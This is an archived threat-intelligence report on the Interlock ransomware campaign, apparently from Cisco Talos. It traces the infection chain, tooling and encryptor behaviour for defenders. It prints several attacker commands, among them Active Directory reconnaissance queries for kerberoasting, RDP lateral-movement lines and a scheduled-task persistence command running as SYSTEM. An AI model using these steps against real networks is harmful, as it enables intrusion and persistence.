{
	"id": "152f7f8e-c8b3-4ea3-9035-d76f97803218",
	"created_at": "2026-04-06T00:18:56.311166Z",
	"updated_at": "2026-04-10T03:29:39.822017Z",
	"deleted_at": null,
	"sha1_hash": "9fd309f32f02d3c4d87ee342ddce50440291c64f",
	"title": "Unwrapping the emerging Interlock ransomware attack",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3752498,
	"plain_text": "Unwrapping the emerging Interlock ransomware attack\r\nBy Elio Biasiotto\r\nPublished: 2024-11-07 · Archived: 2026-04-05 19:54:48 UTC\r\nThursday, November 7, 2024 06:00\r\nCisco Talos Incident Response (Talos IR) recently observed an attacker conducting big-game hunting and\r\ndouble extortion attacks using the relatively new Interlock ransomware.  \r\nOur analysis uncovered that the attacker used multiple components in the delivery chain including a\r\nRemote Access Tool (RAT) masquerading as a fake browser updater, PowerShell scripts, a credential\r\nstealer, and a keylogger before deploying and enabling the ransomware encryptor binary. \r\nWe also observed that the attacker primarily used remote desktop protocol (RDP) to move laterally within\r\nthe victim’s network, as well as other tools such as AnyDesk and PuTTY. \r\nThe attacker used Azure Storage Explorer, which leverages the utility AZCopy, to exfiltrate the victim’s\r\ndata to an attacker-controlled Azure storage blob.  \r\nThe timeline of the attacker’s activity, from the initial compromise stage until the deployment of\r\nransomware encryptor binary, indicates their dwelling time in the victim’s environment was about 17\r\ndays.  \r\nTalos assesses with low confidence that Interlock ransomware is likely a new diversified group that\r\nemerged from Rhysida ransomware operators or developers, based on some similarities in the operators’\r\ntactics, techniques, and procedures (TTPs) and in the ransomware encryptor binaries. \r\nWho is Interlock? \r\nInterlock first appeared in public reporting in September 2024 and has been observed launching big-game hunting\r\nand double extortion attacks. The group has notably targeted businesses in a wide range of sectors, which at the\r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 1 of 14\n\ntime of reporting includes healthcare, technology, government in the U.S. and manufacturing in Europe, according\r\nto the data leak site disclosure, indicating their targeting is opportunistic. \r\nLike other ransomware players in the big-game hunting space, Interlock also operates a data leak site called\r\n“Worldwide Secrets Blog,” providing links to victims’ leaked data, chat support for victims' communications, and\r\nthe email address, “interlock@2mail[.]co”.   \r\nIn their blog, Interlock claims to target organizations’ infrastructure by exploiting unaddressed vulnerabilities and\r\nclaims their actions are in part motivated by a desire to hold companies’ accountable for poor cybersecurity, in\r\naddition to monetary gain. \r\nRecent attack methodologies \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 2 of 14\n\nThroughout the investigation into the Interlock ransomware attack, Talos observed several notable TTPs used by\r\nthe attacker in each stage of the delivery chain. Talos assesses that the attacker was present in the victim’s\r\nenvironment for approximately 17 days, from the initial compromise until deployment and execution of the\r\nInterlock ransomware. \r\nInitial access \r\nThe attacker gained access to the victim machine via a fake Google Chrome browser updater executable that the\r\nvictim was prompted to download from a compromised legitimate news website.  When clicked, the fake browser\r\nupdater executable “upd_2327991.exe” was downloaded onto the victim machine from a second compromised\r\nURL of a legitimate retailer. \r\nExecution \r\nTalos IR discovered the fake browser updater executable is a Remote Access Tool (RAT) that automatically\r\nexecutes an embedded PowerShell script when downloaded and run. The script initially downloads a legitimate\r\nChrome setup executable “ChromeSetup.exe” to the victim machine’s applications temporary folder and\r\nestablished persistence by dropping a Windows shortcut file in the Windows StartUp folder with the file name\r\n“fahhs.lnk” configured to run the RAT every time the victim logs in, establishing persistence.  \r\nSample PowerShell command that downloads the RAT. \r\nThe RAT executes the command “cmd.exe /c systeminfo\" and collects information from victim machine, listed\r\nbelow:\r\nHost Name Time Zone\r\nOS Name Total Physical Memory\r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 3 of 14\n\nOS Version Available Physical Memory\r\nOS Manufacturer Virtual Memory\r\nOS Configuration Max Size\r\nOS Build Type Virtual Memory: Available\r\nRegistered Owner Virtual Memory: In Use\r\nRegistered Organization Page File Location(s)\r\nProduct ID Domain\r\nOriginal Install Date Logon Server\r\nSystem Boot Time Hotfix(s)\r\nSystem Manufacturer Network Card(s)\r\nSystem Model Connection Name\r\nSystem Type Status\r\nProcessor(s) DHCP Enabled\r\nBIOS Version DHCP Server\r\nWindows Directory IP address(es)\r\nSystem Directory Hyper-V Requirements\r\nBoot Device System Locale\r\nThen, the RAT encrypts the collected information in the memory stream. It establishes a secured socket to the\r\ncommand and control (C2) server hidden behind the attacker-controlled Cloudflare domain “apple-online[.]shop”,\r\nsends the encrypted data stream of victim machine information to the C2 server, and waits to receive the\r\nresponse.  \r\nThe RAT also allowed the attacker to execute two other PowerShell commands on the victim machine, which\r\ndownloads the encrypted data blobs of a credential stealer “cht.exe” and a keylogger binary “klg.dll”, decrypts\r\nthem with the passwords “jgSkhg934@kjv#1vkfg2S” and runs them. We observed that the keylogger is a DLL file\r\nthat is run using the LOLBin “rundll32.exe”.  \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 4 of 14\n\nA sample PowerShell command that downloads and runs the Keylogger. \r\nDefense Evasion \r\nTalos IR observed that EDR was disabled on some of the compromised servers in the victim environment during\r\nthe investigation. According to the indicators seen, Talos IR believes that the attacker could have either leveraged\r\nan EDR uninstaller tool or instrumented a vulnerable device driver Sysmon.sys (TfSysMon.sys) to disable the\r\nEDR on the victim machine. We also observed the attacker’s attempts to delete contents of the Event logs on some\r\nof the compromised systems.  \r\nCredential Access \r\nThe credential stealer discovered in this campaign is compiled in Golang. It enumerates the installed browser\r\nprofiles on the victim machine and copies the Login data, Login State, key4.db, browser history and bookmarks\r\nfiles to the victim’s application profile temporary folder. The stealer then processes the data and uses SQL queries\r\nto collect the login information of victims’ online accounts along with the associated account URLs. Finally, the\r\ndata is written to a file “chrgetpdsi.txt” in the user profile temporary folder.  \r\nThe keylogger DLL running on the victim machine is a tiny executable, which hooks to the victim machine\r\nkeyboard and logs keystrokes in a file called “conhost.txt”, the same folder where the Keylogger was\r\ndownloaded.  \r\nDiscovery \r\nThe attacker ran PowerShell commands that are known indicators of pre-kerberoasting reconnaissance, a method\r\nused to obtain domain admin credentials. We assess with moderate confidence that a Kerberoasting attack was\r\nused to obtain accounts with higher privileges. \r\n(('AD_Computers: {0}' -f ([adsiSearcher]'(ObjectClass=computer)').FindAll().count)\r\n([adsisearcher]'(\u0026(objectCategory=user)(servicePrincipalName=*))').FindAll()\r\nLateral Movement \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 5 of 14\n\nTalos IR observed that the attacker primarily used Remote Desktop Protocol (RDP) and several compromised\r\ncredentials to move between systems.  Further analysis showed that the attacker has also used AnyDesk and\r\npossibly LogMeIn to allow remote connectivity. We also spotted the installation of PuTTY on the compromised\r\nmachines, which was likely used to move laterally to Linux hosts. We are not clear how these tools were dropped\r\nand executed on the infected machines. \r\nSample RDP command executions observed during our analysis and with the redacted IP address details are\r\nshown below. \r\nmstsc /v 10.*.*.*\r\n.\\conhost.exe -d \\10.*.*.*\\e$\r\nCollection and Exfiltration  \r\nThe attacker executed storage-explorer, a tool that allows users to manage and interact with Azure Storage, and\r\nAzCopy, which allows users to copy files to a remote Azure storage, in the victim’s machine. We believe that the\r\nattacker used storage-explorer to navigate and identify sensitive information in the victim network and executed\r\nAzCopy to upload the data to the Azure storage blob according to network artifacts analysis. We were not able to\r\nconfirm how the storage-explorer and AzCopy were delivered to the victim machine. \r\nImpact \r\nThe attacker deployed the Interlock ransomware encryptor binary with the file name “conhost.exe”, masquerading\r\nas a legitimate file, onto the victim machine and stored it in a folder named with a single digit number (example:\r\n“3” or “4”) in the user profile application data temporary folder. When run, the ransomware encrypts the targeted\r\nfiles on the victim machine with the file extension “.Interlock” and drops the ransom note “!__README__!.txt”\r\nfile in every folder containing files that the encryptor has attempted to encrypt. Talos IR also observed that the\r\nattacker configured the ransom note to display during interactive login, was pushed using Group Policy Objects\r\n(GPOs), a Windows utility that allows users to manage Windows operating systems and applications.  \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 6 of 14\n\nIn the ransom note, the attacker warns against attempting to recover the encrypted files and rebooting the affected\r\nmachines. They also demand a response within 96 hours or else they threaten to release the victim's data on their\r\nleak site and notify the media outlets, which could lead to financial and reputational damage.  \r\nThe ransom note includes the URL for an onion site where the affected victims can contact the operator to discuss\r\nthe ransom demand and purchase the decryption keys using a unique company ID of sixty alphanumeric\r\ncharacters generated for each victim. \r\nInterlock ransomware analysis \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 7 of 14\n\nTalos observed that Interlock ransomware has both Windows Portable Executable (EXE) and the Linux executable\r\n(ELF) variants, indicating that the attacker is targeting both Windows and Linux machines.   \r\nThe Interlock ransomware encryption binary is a 64-bit executable, compiled on October 2, 2024. The\r\nransomware appears on the victim’s machines in a packed executable format with the custom unpacker code\r\nlocated in its Thread Local Storage and several obfuscated stack strings in the binary which are decrypted during\r\nthe runtime of the ransomware. \r\nWhen the ransomware runs on the victim machine it initializes the binary by loading custom structures, strings,\r\nand Application programming interface (API) functions. After the initialization, it enumerates the logical disk\r\ndrives that are available on the victim machine. Initially, the ransomware checks for the drive letters “A” through\r\n“Z” and excludes the “C drive”. It picks the available logical drives and enumerates all the folders and files in\r\nthem, encrypting the targeted files on the victim machine and appending the file extension “.interlock” on\r\nencrypted files. Once the logical drives are enumerated, the ransomware then enumerates and encrypts the files in\r\nthe folders of the “C drive”.  \r\nDuring this enumeration process, the ransomware excludes specific folders and file extensions on the victim\r\nmachine from being encrypted. The operator hardcoded the folder and files extension exclusion list, shown below,\r\nin the Interlock binary.\r\nFolder exclusion list of Windows Interlock variant:\r\n$Recycle.Bin Windows\r\nBoot $RECYCLE.BIN\r\nDocuments and Settings AppData\r\nPerfLogs WindowsApps\r\nProgramData Windows Defender\r\nRecovery WindowsPowerShell\r\nSystem Volume Information Windows Defender Advanced Threat Protection\r\nFile extension exclusion list of Windows Interlock variant:\r\n.bat .bin .cab\r\n.cmd .com .cur\r\n.diagcab .diagcfg .diagpkg\r\n.drv .hlp .hta\r\n.ico .msi .ocx\r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 8 of 14\n\n.psm1 .src .sys\r\n.ini .url .dll\r\n.exe .ps1 Thumbs.db\r\nThe Linux variant of the Interlock ransomware performs a similar enumeration of directories and files, starting\r\nfrom the root directory, and encrypts the files excluding those that are in the file extension exclusion list\r\nhardcoded in the binary.\r\nFile extension exclusion list of Linux Interlock variant:\r\nboot .cfg .b00\r\n.v00 .v01 .v02\r\n.v03 .v04 .v05\r\n.v06 .v07 .t00\r\nInterlock ransomware uses LibTomCrypt library, an open-source comprehensive, modular and portable\r\ncryptographic library for encryption.  The Windows Interlock ransomware variant uses the Cipher Block Chaining\r\n(CBC) encryption technique to encrypt the files on the victim machine whereas the Linux Interlock variant uses\r\neither CBC or RSA encryption technique. \r\nEncryption routine in Windows variant  Encryption routine in ELF variant \r\n \r\n \r\nAfter encrypting each of the targeted files in the victim machine Interlock drops the ransom note\r\n“!__README__!.txt” file in each of the enumerated folders. \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 9 of 14\n\nWindows variant ransom note function  ELF variant ransom note function \r\n   \r\nWe observed that the Windows Interlock variant creates a windows task name “TaskSystem” that runs at 8:00 PM\r\ndaily on the victim machine as a SYSTEM user executing the configured command to run the ransomware,\r\nindicating the ransomware establishing the persistence.  \r\nschtasks /create /sc DAILY /tn “TaskSystem” /tr “cmd /c cd \"$Path of the Interlock binary\" \u0026\u0026 \"$command” /st\r\n20:00 /ru system \u003e nul\r\nThe ransomware has the capability to delete itself upon encrypting the targeted files, hiding the evidence of the\r\nencryption binary on the victim machine.  To delete the encryption binary in the Windows variant, Interlock\r\nransomware has a tiny DLL binary embedded in the data section that is dropped into the user profile applications\r\ntemporary folder with the file name “tmp41.wasd”.  \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 10 of 14\n\nThen, “rundll32.exe” is used to execute the DLL’s export function, called “run”, which then executes the remove()\r\nfunction to delete the encryption binary.  \r\nThe Linux variant uses a similar technique to delete the encryptor binary from the victim machine, by executing\r\nthe removeme function, which is an inline routine in the same encryptor binary.  \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 11 of 14\n\nInterlock TTPs overlap with Rhysida Ransomware \r\nTalos assesses with low confidence that Interlock ransomware is a new diversified group that emerged from\r\nRhysida operators or developers, based on some similarities in TTPs, tools, and the ransomware encryptor\r\nbinaries’ behaviors. \r\nWe discovered code overlaps in the binaries of Interlock and Rhysida ransomware samples. Notably, the files and\r\nfolders exclusion list hardcoded in the Windows variant of the Interlock ransomware has similarities with the\r\nexclusion list in Rhysida ransomware, reported by Talos in an August 2023 Threat Advisory. \r\nAdditionally, the Interlock ransomware encryptor with the filename “conhost.exe” was earlier seen in Rhysida\r\nransomware attacks, along with overlaps in TTPs and tools including PowerShell scripts, AnyDesk, and PuTTY,\r\nbased on a CISA #StopRansomware advisory report on Rhysida Ransomware. Furthermore, both Rhysida and\r\nInterlock operators use AzCopy to exfiltrate the victim’s data to an attacker-controlled Azure storage blob, an old\r\nbut uncommon technique. \r\nFinally, Interlock and Rhysida deliver ransom notes with a similar theme, where they portray themselves as a\r\nhelpful partner notifying the victim of a breach and offering to help rectify it. This is in contrast to other prolific\r\nand sophisticated cyber groups, such a Black Basta and ALPHV, whose ransom notes demand payment, threaten,\r\nand attempt to intimidate the victim.  \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 12 of 14\n\nRhysida ransom note. \r\nInterlock ransom note. \r\nInterlock’s possible affiliation with Rhysida operators or developers would align with several broader trends in the\r\ncyber threat landscape, which Talos reported in our 2022 and 2023 Year in Review reports. We observed\r\nransomware groups diversifying their capabilities to support more advanced and varied operations, and\r\nransomware groups have been growing less siloed, as we observed operators increasingly working alongside\r\nmultiple ransomware groups. \r\nCoverage \r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here. \r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in\r\nthese attacks. \r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of\r\ntheir campaign. You can try Secure Email for free here. \r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat\r\nDefense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this\r\nthreat. \r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 13 of 14\n\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products. \r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and\r\nURLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here. \r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites\r\nand tests suspicious sites before users access them. \r\nAdditional protection with context to your specific environment and threat data are available from the Firewall\r\nManagement Center. \r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your\r\nnetwork. \r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack\r\navailable for purchase on Snort.org. Snort SIDs for this threat are 64114, 64113, 64189 and 301042. \r\nClamAV detections are also available for this threat: \r\nWin.Ransomware.Interlock-10036524-0 \r\nUnix.Ransomware.Interlock-10036662-0 \r\nWin.Trojan.Kryptik-10036729-0 \r\nWin.Downloader.Kryptik-10036730-0 \r\nIndicators of Compromise \r\nIOCs for this threat can be found in our GitHub repository here. \r\nSource: https://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nhttps://blog.talosintelligence.com/emerging-interlock-ransomware/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://blog.talosintelligence.com/emerging-interlock-ransomware/"
	],
	"report_names": [
		"emerging-interlock-ransomware"
	],
	"threat_actors": [
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434736,
	"ts_updated_at": 1775791779,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9fd309f32f02d3c4d87ee342ddce50440291c64f.pdf",
		"text": "https://archive.orkl.eu/9fd309f32f02d3c4d87ee342ddce50440291c64f.txt",
		"img": "https://archive.orkl.eu/9fd309f32f02d3c4d87ee342ddce50440291c64f.jpg"
	}
}